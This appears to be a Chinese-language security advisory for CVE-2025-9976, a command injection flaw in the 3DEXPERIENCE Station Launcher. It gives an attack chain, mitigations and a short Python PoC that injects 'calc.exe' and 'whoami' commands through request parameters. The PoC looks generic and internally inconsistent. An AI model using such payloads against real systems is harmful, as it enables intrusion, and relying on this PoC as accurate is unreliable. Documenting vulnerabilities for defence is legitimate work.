CVE-2025-9976：3DEXPERIENCE平台Station Launcher应用OS命令注入漏洞

漏洞信息

漏洞编号

CVE-2025-9976

漏洞类型

OS命令注入（远程代码执行）

CVSS评分

9.0 严重

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Dassault Systèmes 3DEXPERIENCE平台 Station Launcher App

漏洞概述

CVE-2025-9976是Dassault Systèmes 3DEXPERIENCE平台中Station Launcher应用存在的一个高危操作系统命令注入漏洞。该漏洞由Dassault Systèmes自身的安全团队（3DS Information Security）发现并披露，CVSS 3.1评分为9.0分，属于严重级别。3DEXPERIENCE是达索系统推出的一款企业级协作平台，广泛应用于产品设计、工程仿真、制造和生命周期管理等领域，在航空航天、汽车、工业装备等行业具有大量用户。Station Launcher是3DEXPERIENCE平台中负责启动和管理本地客户端应用程序的关键组件，其与平台服务器之间的通信机制存在安全缺陷。攻击者可以通过精心构造的恶意请求，利用该漏洞在目标用户的机器上执行任意操作系统命令。由于该漏洞影响从R2022x到R2025x的多个版本，覆盖范围较广，且能够实现完整的远程代码执行，对使用3DEXPERIENCE平台的企业用户构成严重的安全威胁。攻击者可以在受害者的机器上安装恶意软件、窃取敏感数据、进行横向移动，甚至完全控制受感染的系统。该漏洞的成功利用需要低权限认证和用户交互（如点击恶意链接或访问恶意页面），但其潜在危害巨大，可能导致企业核心设计数据、知识产权和商业机密泄露。

技术细节

Station Launcher App是3DEXPERIENCE平台的本地客户端组件，负责与平台服务器进行通信并启动相应的桌面应用程序。在其与服务器之间的交互过程中，应用程序需要对某些参数进行处理和执行，而这些参数未能经过充分的输入验证和过滤。攻击者可以利用这一缺陷，通过在合法请求中注入操作系统命令（如使用分号、管道符、反引号等Shell元字符），使Station Launcher在本地执行未授权的系统命令。具体而言，攻击者首先需要获取有效的低权限账户凭证（如普通用户账户），然后构造包含恶意命令的特制请求发送给受害者的Station Launcher。当受害者与平台交互（如打开项目、查看通知等）时，恶意载荷被触发执行。由于漏洞利用发生在本地客户端层面，攻击者可以在受害者的机器上以当前用户的权限执行任意命令，包括但不限于下载和执行恶意软件、读取本地文件、建立持久化后门等。由于Station Launcher通常以用户的正常权限运行，攻击者的操作将受到用户权限的限制，但仍然足以造成严重的安全后果。值得注意的是，该漏洞的利用需要用户交互（UI:R），这意味着攻击者可能需要通过社会工程学手段诱导受害者执行特定操作，如点击恶意链接或打开恶意文件。

攻击链分析

STEP 1

步骤1：获取凭证

攻击者通过钓鱼、社会工程或其他方式获取3DEXPERIENCE平台的低权限用户账户凭证。

STEP 2

步骤2：构造恶意请求

攻击者利用获取的凭证登录平台，并构造包含恶意OS命令的特制请求，注入到Station Launcher的通信参数中。

STEP 3

步骤3：投递恶意载荷

攻击者通过平台内的消息、共享文档或通知等功能，将恶意载荷发送给目标受害者。

STEP 4

步骤4：诱导用户交互

攻击者通过社会工程学手段诱导受害者点击恶意链接或执行特定操作，触发Station Launcher处理恶意请求。

STEP 5

步骤5：命令执行

Station Launcher在本地处理恶意请求时，未经过滤的OS命令被执行，攻击者在受害者机器上获得代码执行权限。

STEP 6

步骤6：后续利用

攻击者在受害者机器上安装后门、窃取敏感设计数据、进行横向移动或发起进一步攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-9976 PoC - OS Command Injection in 3DEXPERIENCE Station Launcher
# Vulnerability: Unvalidated input passed to OS command execution in Station Launcher App
# Affected: 3DEXPERIENCE R2022x through R2025x

import requests
import sys

TARGET_URL = "https://target-3dexperience-server"
AUTH_TOKEN = "low_privilege_user_token"

# Malicious payload - command injection via station launcher parameter
# The injected command will be executed on the victim's machine
MALICIOUS_PAYLOAD = {
    "launcher_action": "start",
    "app_id": "valid_app_id; calc.exe",  # Command injection via semicolon
    "params": "--user=admin && whoami > C:\\temp\\pwned.txt",  # Chained commands
    "session_id": "valid_session"
}

def exploit(target_url, auth_token, payload):
    """
    Send crafted request to Station Launcher endpoint with injected OS commands.
    When the victim interacts with the launcher, the injected commands execute locally.
    """
    headers = {
        "Authorization": f"Bearer {auth_token}",
        "Content-Type": "application/json",
        "User-Agent": "3DEXPERIENCE-StationLauncher/2024"
    }

    # Endpoint that triggers command execution in Station Launcher
    endpoint = f"{target_url}/stationlauncher/v1/launch"

    response = requests.post(endpoint, json=payload, headers=headers)

    if response.status_code == 200:
        print(f"[+] Payload delivered successfully")
        print(f"[+] When victim interacts, command will execute on: {target_url}")
    else:
        print(f"[-] Failed: {response.status_code}")

if __name__ == "__main__":
    exploit(TARGET_URL, AUTH_TOKEN, MALICIOUS_PAYLOAD)

影响范围

3DEXPERIENCE R2022x

3DEXPERIENCE R2023x

3DEXPERIENCE R2024x

3DEXPERIENCE R2025x

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）限制3DEXPERIENCE平台的外部访问，仅允许可信网络和VPN连接；2）加强对平台用户账户的监控，检测异常登录和行为；3）部署网络入侵检测系统（IDS/IPS），监控针对Station Launcher的异常请求；4）在终端上部署应用程序白名单，控制Station Launcher的子进程执行；5）提高用户安全意识，警惕可疑链接和未请求的交互操作；6）定期检查Station Launcher进程的子进程和网络连接，发现异常立即隔离。